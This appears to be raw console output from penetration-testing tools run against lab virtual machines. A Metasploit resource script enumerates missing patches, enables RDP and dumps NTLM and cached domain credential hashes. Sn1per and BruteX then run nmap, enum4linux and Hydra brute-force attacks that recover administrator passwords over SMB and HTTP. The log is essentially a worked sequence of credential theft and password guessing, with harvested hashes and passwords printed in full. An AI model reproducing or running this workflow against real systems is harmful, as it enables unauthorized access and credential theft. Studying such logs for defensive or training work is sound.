[*] The following shares were found:
[*] Name: C
[*] Path: C:\
[*] Type: 0
[*]
[*] Name: Downloads
[*] Path: C:\Documents and Settings\test\My Documents\Downloads
[*] Type: 0
[*]
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_patches
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[+] KB2871997 is missing
[+] KB2928120 is missing
[+] KB977165 - Possibly vulnerable to MS10-015 kitrap0d if Windows 2K SP4 - Windows 7 (x86)
[+] KB2305420 - Possibly vulnerable to MS10-092 schelevator if Vista, 7, and 2008
[+] KB2592799 - Possibly vulnerable to MS11-080 afdjoinleaf if XP SP2/SP3 Win 2k3 SP2
[+] KB2778930 - Possibly vulnerable to MS13-005 hwnd_broadcast, elevates from Low to Medium integrity
[+] KB2850851 - Possibly vulnerable to MS13-053 schlamperei if x86 Win7 SP0/SP1
[+] KB2870008 - Possibly vulnerable to MS13-081 track_popup_menu if x86 Windows 7 SP0/SP1
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/domain_hashdump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[-] This does not appear to be an AD Domain Controller
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/manage/enable_rdp
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf5/loot/20160201074436_default_192.168.1.129_host.windows.cle_349030.txt
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_domain
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/credentials/credential_collector
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[+] Collecting hashes...
Extracted: Administrator:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: hacker:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665
Extracted: HelpAssistant:447873b78295638165d0a1a58736c426:c379debb205ae80e84bda1b3d430b6c8
Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:1534c54bed98875639d7e77ae9d51345
Extracted: test:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
Extracted: test2:e52cac67419a9a2217e4c3576fe93615:b490b475e987909ae9bd83a65aa94665
[+] Collecting tokens...
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XEROSECURITY\Administrator
NT AUTHORITY\ANONYMOUS LOGON
TEST-3F6416AC49\Administrator
TEST-3F6416AC49\Guest
TEST-3F6416AC49\test
XEROSECURITY\user
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_computers
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Running module against TEST-3F6416AC49
[-] This host is not part of a domain.
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/cachedump
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[*] Executing module against TEST-3F6416AC49
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] XP or below system
[*] Obtaining LK$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE format. (mscash)
[*] MSCACHE v1 saved in: /root/.msf5/loot/20160201074451_default_192.168.1.129_mscache.creds_214171.txt
[*] John the Ripper format:
# mscash
user:M$user#c158f3e72ab78ed2adb9d0fab0e1ec23:XEROSECURITY.COMn:XEROSECURITY
administrator:M$administrator#0620d5420b059bf1ead3532f9ec4ddff:XEROSECURITY.COMA:XEROSECURITY
[*] Post module execution completed
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> use post/windows/gather/enum_ad_computers
resource (/pentest/windows/metasploit-windows-post-exploitation-critical.rc)> run
[-] extapi_adsi_domain_query: Operation failed: 2147950650
[*] Post module execution completed
[3;J
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3
################################### Running recon #################################
Server: 206.248.154.22
Address: 206.248.154.22#53
** server can't find 138.1.168.192.in-addr.arpa: NXDOMAIN
Host 138.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)
################################### Pinging host ###################################
PING 192.168.1.138 (192.168.1.138) 56(84) bytes of data.
64 bytes from 192.168.1.138: icmp_seq=1 ttl=128 time=0.555 ms
--- 192.168.1.138 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.555/0.555/0.555/0.000 ms
################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:10 EST
Nmap scan report for 192.168.1.138
Host is up (0.00021s latency).
Not shown: 65506 closed ports
PORT STATE SERVICE VERSION
42/tcp open tcpwrapped
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Windows 2003 Kerberos (server time: 2016-01-31 01:16:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds (primary domain: XEROSECURITY)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49164/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49168/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49174/tcp open msrpc Microsoft Windows RPC
49188/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port445-TCP:V=7.01%I=7%D=1/30%Time=56AD6069%P=x86_64-pc-linux-gnu%r(SMB
SF:ProgNeg,8B,"\0\0\0\x87\xffSMBr\0\0\0\0\x88\[email protected]\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\[email protected]\x06\0\0\x01\0\x11\x07\0\x0f2\0\x01\0\x04A\0\0\0\0\x01\0\0\0\0\0\x
SF:fc\xf3\x01\0\xb3\xf6R\xfe\xc4\[\xd1\x01,\x01\x08B\0\^<\x83\x86R\x92\x93
SF:\x9bX\0E\0R\0O\0S\0E\0C\0U\0R\0I\0T\0Y\0\0\0W\0I\0N\0-\x008\0M\0S\0B\x0
SF:02\0D\0D\x005\x002\0P\x009\0\0\0");
MAC Address: 00:0C:29:82:29:F9 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2012|8.1
OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: WIN-8MSB2DD52P9; OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows_98
Host script results:
|_nbstat: NetBIOS name: WIN-8MSB2DD52P9, NetBIOS user: , NetBIOS MAC: 00:0c:29:82:29:f9 (VMware)
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: WIN-8MSB2DD52P9
| NetBIOS computer name: WIN-8MSB2DD52P9
| Domain name: xerosecurity.com
| Forest name: xerosecurity.com
| FQDN: WIN-8MSB2DD52P9.xerosecurity.com
|_ System time: 2016-01-30T20:17:18-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.1.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 408.91 seconds
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:17 EST
Nmap scan report for 192.168.1.138
Host is up (0.00021s latency).
Not shown: 5 closed ports
PORT STATE SERVICE VERSION
53/udp open domain Microsoft DNS
|_dns-recursion: Recursion appears to be enabled
67/udp open|filtered dhcps
88/udp open kerberos-sec Windows 2003 Kerberos (server time: 2016-01-31 01:17:36Z)
137/udp open netbios-ns Microsoft Windows netbios-ssn (workgroup: XEROSECURITY)
138/udp open|filtered netbios-dgm
161/udp open|filtered snmp
| snmp-hh3c-logins:
|_ baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
389/udp open|filtered ldap
MAC Address: 00:0C:29:82:29:F9 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: WIN-8MSB2DD52P9; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2003, cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-8MSB2DD52P9, NetBIOS user: , NetBIOS MAC: 00:0c:29:82:29:f9 (VMware)
TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.1.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.15 seconds
################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 53 opened... running tests...
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:19 EST
Nmap scan report for 192.168.1.138
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
|_dns-fuzz: ERROR: Script execution failed (use -d to debug)
|_dns-nsec-enum: Can't determine domain for host 192.168.1.138; use dns-nsec-enum.domains script arg.
|_dns-nsec3-enum: Can't determine domain for host 192.168.1.138; use dns-nsec3-enum.domains script arg.
MAC Address: 00:0C:29:82:29:F9 (VMware)
Host script results:
| dns-blacklist:
| SPAM
|_ l2.apews.org - FAIL
|_dns-brute: Can't guess domain of "192.168.1.138"; use dns-brute.domain script argument.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.06 seconds
+ -- --=[Port 79 closed... skipping.
+ -- --=[Port 80 opened... running tests...
^ ^
_ __ _ ____ _ __ _ _ ____
///7/ /.' \ / __////7/ /,' \ ,' \ / __/
| V V // o // _/ | V V // 0 // 0 // _/
|_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
<
...'
WAFW00F - Web Application Firewall Detection Tool
By Sandro Gauci && Wendel G. Henrique
Checking http://192.168.1.138
Generic Detection results:
The site http://192.168.1.138 seems to be behind a WAF
Reason: The server header is different when an attack is detected.
The server header for a normal response is "Microsoft-IIS/8.5", while the server header a response to an attack is "Microsoft-HTTPAPI/2.0.",
Number of requests: 12
http://192.168.1.138 [200] Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/8.5], IP[192.168.1.138], Microsoft-IIS[8.5], Title[IIS Windows Server]
+ -- --=[Port 139 opened... running tests...
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 30 20:22:46 2016
==========================
| Target Information |
==========================
Target ........... 192.168.1.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.168.1.138 |
=====================================================
[+] Got domain/workgroup name: XEROSECURITY
=============================================
| Nbtstat Information for 192.168.1.138 |
=============================================
Looking up status of 192.168.1.138
WIN-8MSB2DD52P9 <00> - M Workstation Service
XEROSECURITY <00> - M Domain/Workgroup Name
XEROSECURITY <1c> - M Domain Controllers
WIN-8MSB2DD52P9 <20> - M File Server Service
XEROSECURITY <1b> - M Domain Master Browser
MAC Address = 00-0C-29-82-29-F9
======================================
| Session Check on 192.168.1.138 |
======================================
[+] Server 192.168.1.138 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.168.1.138 |
============================================
Domain Name: XEROSECURITY
Domain Sid: S-1-5-21-1088676282-494858925-2056655024
[+] Host is part of a domain (not a workgroup)
=======================================
| OS information on 192.168.1.138 |
=======================================
[+] Got OS info for 192.168.1.138 from smbclient: Domain=[XEROSECURITY] OS=[Windows Server 2012 R2 Datacenter 9600] Server=[Windows Server 2012 R2 Datacenter 6.3]
[+] Got OS info for 192.168.1.138 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
==============================
| Users on 192.168.1.138 |
==============================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
==========================================
| Share Enumeration on 192.168.1.138 |
==========================================
[E] Can't list shares: NT_STATUS_ACCESS_DENIED
[+] Attempting to map shares on 192.168.1.138
=====================================================
| Password Policy Information for 192.168.1.138 |
=====================================================
[E] Can't connect to host with supplied credentials.
[E] Failed to get password policy with rpcclient
===============================
| Groups on 192.168.1.138 |
===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
========================================================================
| Users on 192.168.1.138 via RID cycling (RIDS: 500-550,1000-1050) |
========================================================================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================================
| Getting printer info for 192.168.1.138 |
==============================================
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Sat Jan 30 20:22:46 2016
Traceback (most recent call last):
File "bin/samrdump.py", line 159, in
logger.init()
AttributeError: 'module' object has no attribute 'init'
Doing NBT name scan for addresses from 192.168.1.138
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.1.138 WIN-8MSB2DD52P9 00:0c:29:82:29:f9
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:22 EST
Nmap scan report for 192.168.1.138
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows 98 netbios-ssn
MAC Address: 00:0C:29:82:29:F9 (VMware)
Service Info: OS: Windows 98; CPE: cpe:/o:microsoft:windows_98
Host script results:
| smb-brute:
|_ guest: => Valid credentials, account disabled
| smb-enum-shares:
| note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
| account_used:
| ADMIN$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access:
| C$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access:
| DESKTOP:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access:
| IPC$:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
| Anonymous access: READ
| NETLOGON:
| warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_ Anonymous access:
| smb-mbenum:
|_ ERROR: Call to Browser Service failed with status = 2184
| smb-os-discovery:
| OS: Windows Server 2012 R2 Datacenter 9600 (Windows Server 2012 R2 Datacenter 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: WIN-8MSB2DD52P9
| NetBIOS computer name: WIN-8MSB2DD52P9
| Domain name: xerosecurity.com
| Forest name: xerosecurity.com
| FQDN: WIN-8MSB2DD52P9.xerosecurity.com
|_ System time: 2016-01-30T20:23:40-05:00
|_smb-print-text: false
| smb-psexec: Can't find the service file: nmap_service.exe (or nmap_service).
| Due to false positives in antivirus software, this module is no
| longer included by default. Please download it from
| https://nmap.org/psexec/nmap_service.exe
|_and place it in nselib/data/psexec/ under the Nmap DATADIR.
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smbv2-enabled: Server supports SMBv2 protocol
__________ __ ____ ___
\______ \_______ __ ___/ |_ ____ \ \/ /
| | _/\_ __ \ | \ __\/ __ \ \ /
| | \ | | \/ | /| | \ ___/ / \
|______ / |__| |____/ |__| \___ >___/\ \
\/ \/ \_/
+ -- --=[BruteX v1.3 by 1N3
+ -- --=[http://xerosecurity.com
################################### Running Port Scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-30 20:29 EST
Nmap scan report for 192.168.1.138
Host is up (0.00081s latency).
Not shown: 21 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
MAC Address: 00:0C:29:82:29:F9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
################################### Running Brute Force ############################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 80 opened... running tests...
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jan 30 20:29:21 2016
URL_BASE: http://192.168.1.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.138/ ----
-----------------
END_TIME: Sat Jan 30 20:29:23 2016
DOWNLOADED: 4612 - FOUND: 0
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:23
[WARNING] http-head auth does not work with every server, better use http-get
[DATA] max 30 tasks per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~0 tries per task
[DATA] attacking service http-head on port 80
[80][http-head] host: 192.168.1.138 login: admin password: <<< %s(un='%s') = %u
[STATUS] attack finished for 192.168.1.138 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-30 20:29:23
+ -- --=[Port 110 closed... skipping.
+ -- --=[Port 139 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:23
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138 login: Administrator password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-30 20:29:24
+ -- --=[Port 389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:24
[ERROR] you may only use one of -l, -L or -m
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:24
[ERROR] you may only use one of -l, -L or -m
+ -- --=[Port 443 closed... skipping.
+ -- --=[Port 445 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-01-30 20:29:24
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138 login: Administrator password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-01-30 20:29:24
################################### Done! ###########################################
[3;J
__________ __ ____ ___
\______ \_______ __ ___/ |_ ____ \ \/ /
| | _/\_ __ \ | \ __\/ __ \ \ /
| | \ | | \/ | /| | \ ___/ / \
|______ / |__| |____/ |__| \___ >___/\ \
\/ \/ \_/
+ -- --=[BruteX v1.3 by 1N3
+ -- --=[http://xerosecurity.com
################################### Running Port Scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-01 07:07 EST
Nmap scan report for 192.168.1.129
Host is up (0.0011s latency).
Not shown: 23 closed ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:FB:8C:7C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
################################### Running Brute Force ############################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 80 closed... skipping.
+ -- --=[Port 110 closed... skipping.
+ -- --=[Port 139 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:18
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.129 login: Administrator password: password
[445][smb] Host: 192.168.1.129 Account: admin Error: Invalid account (Anonymous success)
[445][smb] host: 192.168.1.129 login: guest
[445][smb] host: 192.168.1.129 login: test password: password
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:18
+ -- --=[Port 389 closed... skipping.
+ -- --=[Port 443 closed... skipping.
+ -- --=[Port 445 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:18
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.129 login: Administrator password: password
[445][smb] Host: 192.168.1.129 Account: admin Error: Invalid account (Anonymous success)
[445][smb] host: 192.168.1.129 login: guest
[445][smb] host: 192.168.1.129 login: test password: password
1 of 1 target successfully completed, 3 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:18
+ -- --=[Port 512 closed... skipping.
+ -- --=[Port 513 closed... skipping.
+ -- --=[Port 514 closed... skipping.
+ -- --=[Port 993 closed... skipping.
+ -- --=[Port 1433 closed... skipping.
+ -- --=[Port 1521 closed... skipping.
+ -- --=[Port 3306 closed... skipping.
+ -- --=[Port 3389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:18
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] max 30 tasks per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~0 tries per task
[DATA] attacking service rdp on port 3389
[ERROR] Child with pid 9213 terminating, can not connect
[ERROR] Child with pid 9214 terminating, can not connect
[ERROR] Child with pid 9212 terminating, can not connect
[ERROR] Child with pid 9211 terminating, can not connect
[ERROR] Child with pid 9217 terminating, can not connect
[ERROR] Child with pid 9215 terminating, can not connect
[ERROR] Child with pid 9218 terminating, can not connect
[ERROR] Child with pid 9216 terminating, can not connect
[ERROR] Child with pid 9221 terminating, can not connect
[ERROR] Child with pid 9219 terminating, can not connect
[ERROR] Child with pid 9220 terminating, can not connect
[ERROR] Child with pid 9224 terminating, can not connect
[ERROR] Child with pid 9223 terminating, can not connect
[ERROR] Child with pid 9225 terminating, can not connect
[ERROR] Child with pid 9222 terminating, can not connect
[ERROR] Child with pid 9226 terminating, can not connect
[ERROR] Child with pid 9227 terminating, can not connect
[ERROR] Child with pid 9228 terminating, can not connect
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
+ -- --=[Port 5432 closed... skipping.
+ -- --=[Port 5900 closed... skipping.
+ -- --=[Port 5901 closed... skipping.
+ -- --=[Port 8000 closed... skipping.
+ -- --=[Port 8080 closed... skipping.
+ -- --=[Port 8100 closed... skipping.
+ -- --=[Port 6667 closed... skipping.
################################### Done! ###########################################
[3;J
__________ __ ____ ___
\______ \_______ __ ___/ |_ ____ \ \/ /
| | _/\_ __ \ | \ __\/ __ \ \ /
| | \ | | \/ | /| | \ ___/ / \
|______ / |__| |____/ |__| \___ >___/\ \
\/ \/ \_/
+ -- --=[BruteX v1.3 by 1N3
+ -- --=[http://xerosecurity.com
################################### Running Port Scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-02-01 07:07 EST
Nmap scan report for 192.168.1.138
Host is up (0.00078s latency).
Not shown: 20 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:82:29:F9 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
################################### Running Brute Force ############################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 closed... skipping.
+ -- --=[Port 23 closed... skipping.
+ -- --=[Port 25 closed... skipping.
+ -- --=[Port 80 opened... running tests...
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Feb 1 07:07:41 2016
URL_BASE: http://192.168.1.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.138/ ----
-----------------
END_TIME: Mon Feb 1 07:07:43 2016
DOWNLOADED: 4612 - FOUND: 0
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:43
[WARNING] http-head auth does not work with every server, better use http-get
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 30 tasks per 1 server, overall 64 tasks, 1496 login tries (l:34/p:44), ~0 tries per task
[DATA] attacking service http-head on port 80
[80][http-head] host: 192.168.1.138 login: admin
[STATUS] attack finished for 192.168.1.138 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:54
+ -- --=[Port 110 closed... skipping.
+ -- --=[Port 139 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138 login: Administrator password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:54
+ -- --=[Port 389 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[ERROR] you may only use one of -l, -L or -m
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[ERROR] you may only use one of -l, -L or -m
+ -- --=[Port 443 closed... skipping.
+ -- --=[Port 445 opened... running tests...
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-02-01 07:07:54
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 64 tasks, 176 login tries (l:4/p:44), ~2 tries per task
[DATA] attacking service smb on port 445 with SSL
[445][smb] host: 192.168.1.138 login: Administrator password: Password123$
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-02-01 07:07:54
